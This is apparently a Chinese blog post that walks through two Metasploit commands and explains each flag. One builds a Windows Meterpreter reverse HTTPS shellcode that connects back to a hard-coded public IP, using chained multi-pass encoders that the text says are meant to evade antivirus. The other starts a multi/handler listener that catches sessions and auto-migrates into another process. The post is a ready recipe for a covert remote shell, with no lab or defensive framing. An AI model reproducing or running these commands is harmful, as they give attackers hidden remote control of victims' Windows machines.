###生成payload
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw
好的,这条命令是在使用 msfvenom
工具生成一个 Windows 平台的 Meterpreter 反向 HTTPS shellcode。
以下是该命令的翻译和解释:
翻译和解释:
msfvenom -p windows/meterpreter/reverse_winhttps
生成一个反向 Meterpreter payload,使用 HTTPS 协议。
LHOST=39.97.167.211 LPORT=6667
指定反向连接的主机 IP 地址和端口号,
LHOST
是本地监听的 IP,LPORT
是本地监听的端口。
--platform windows -a x86
目标平台是 Windows,体系结构是 x86。
HandLerSSLCert= ./my.pem
指定 SSL 证书文件
my.pem
,用于加密通信。
StagerVerifySSLCert=true
确保 payload 验证 SSL 证书。
-s 42 --smallest
使用 42 字节的 stager,生成尽可能小的 payload。
-e x86/shikata_ga_nai -i 9
使用
shikata_ga_nai
编码器对 payload 进行 9 次编码。
-f raw
生成原始格式的 payload。
| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw
将第一个 payload 通过管道传递给第二个
msfvenom
实例,使用countdown
编码器进行 8 次编码,生成原始格式的 payload。
| msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw
将第二个 payload 通过管道传递给第三个
msfvenom
实例,使用call4_dword_xor
编码器进行 6 次编码,并排除字节\x00
,\x0a
, 和\x0d
。生成原始格式的 payload。
> /home/xskali/kali/Shecodject/output/shellcode.raw
将最终生成的 shellcode 保存到指定路径
shellcode.raw
文件中。
这个过程利用了多个编码器对 payload 进行编码和混淆,以试图绕过防病毒软件的检测。
###监听
msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'
这条命令用于启动 Metasploit Framework 的 msfconsole
并配置一个监听器以接收反向 Meterpreter 连接。
下面是对命令的逐步翻译和解释:
翻译和解释:
msfconsole -q -x
启动 Metasploit Framework 的
msfconsole
,-q
参数表示安静模式(即不显示横幅和欢迎信息),-x
允许直接传递一组命令给msfconsole
执行。
'use exploit/multi/handler;
使用
exploit/multi/handler
模块,这是一个通用的处理模块,用于处理反向连接的 payload。
set ExitOnSession false;
设置
ExitOnSession
选项为false
,这意味着当一个会话被接收到时,msfconsole
不会退出,允许继续接收其他会话。
set PAYLOAD windows/meterpreter/reverse_winhttps;
设置 payload 类型为
windows/meterpreter/reverse_winhttps
,这是一个用于 Windows 的反向 Meterpreter payload,通过 HTTPS 协议进行通信。
set LHOST 192.168.129.128;
设置
LHOST
(本地监听 IP)为192.168.129.128
,这是攻击者机器的 IP 地址,监听来自目标机器的连接。
set LPORT 4445;
设置
LPORT
(本地监听端口)为4445
,这是攻击者机器上监听连接的端口。
set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;
设置 SSL 证书文件的路径为
/home/xskali/kali/Shecodject/output/my.pem
,用于加密通信。
set StagerVerifySSLCert true;
确保 payload 验证 SSL 证书,这有助于提高安全性。
set SessionCommunicationTimeout 600;
设置会话通信超时为 600 秒(10 分钟),如果会话在这段时间内没有活动,将会被关闭。
set autorunscript post/windows/manage/migrate;
设置自动运行脚本为
post/windows/manage/migrate
,这个脚本在会话启动后自动运行,通常用于将 Meterpreter 会话迁移到其他进程。
run -j -Z'
运行处理程序并将其设置为后台作业(
-j
),同时禁用作业日志输出(-Z
)。
整体来说,这条命令会启动 Metasploit 的监听器,并配置了必要的选项来处理反向连接的 Meterpreter 会话,同时应用一些安全和管理设置。
标签:set,系列,x86,windows,raw,msfvenom,MSF,合集,payload From: https://www.cnblogs.com/o-O-oO/p/18351958